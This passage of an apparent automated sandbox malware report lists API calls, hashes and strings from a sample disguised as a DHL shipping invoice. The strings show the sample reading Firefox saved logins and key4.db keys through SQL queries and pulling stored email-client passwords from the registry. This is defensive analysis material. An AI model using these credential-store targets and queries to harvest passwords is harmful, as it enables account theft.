                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                                      • API String ID: 4171719235-3943159138
                                                                                                                                                                                                                                      • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                                      • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,7739E430,?,00000000), ref: 00402533
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                                      • API String ID: 168965057-606283353
                                                                                                                                                                                                                                      • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                                                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,7739E430,?,00000000), ref: 004028A3
                                                                                                                                                                                                                                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7739E430,?,00000000), ref: 0040297B
                                                                                                                                                                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                                      • API String ID: 1497257669-167382505
                                                                                                                                                                                                                                      • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                      • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2998058495-0
                                                                                                                                                                                                                                      • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                                                                                                                                      • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                                                                                                                                      • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                                                                                                                                      • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                                                                                                                                      • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                                      • API String ID: 231171946-2189169393
                                                                                                                                                                                                                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                      • API String ID: 633282248-1996832678
                                                                                                                                                                                                                                      • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406782
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • key4.db, xrefs: 00406756
                                                                                                                                                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                                                                      • , xrefs: 00406834
                                                                                                                                                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                                      • API String ID: 3614188050-3983245814
                                                                                                                                                                                                                                      • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                      • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A973
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A996
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A9AC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A9BC
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AABE
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                                                                                                                                        • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AB21
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`|u,00000000,?,?,0040A7BE,00000001,0044CBC0,757C0A60), ref: 00406D4D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                      • API String ID: 710961058-601624466
                                                                                                                                                                                                                                      • Opcode ID: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                      • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c33c3296b7e77e76534675bd69894b8e30877f2258b439036e8e249278821d93
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: sprintf$memset$_mbscpy
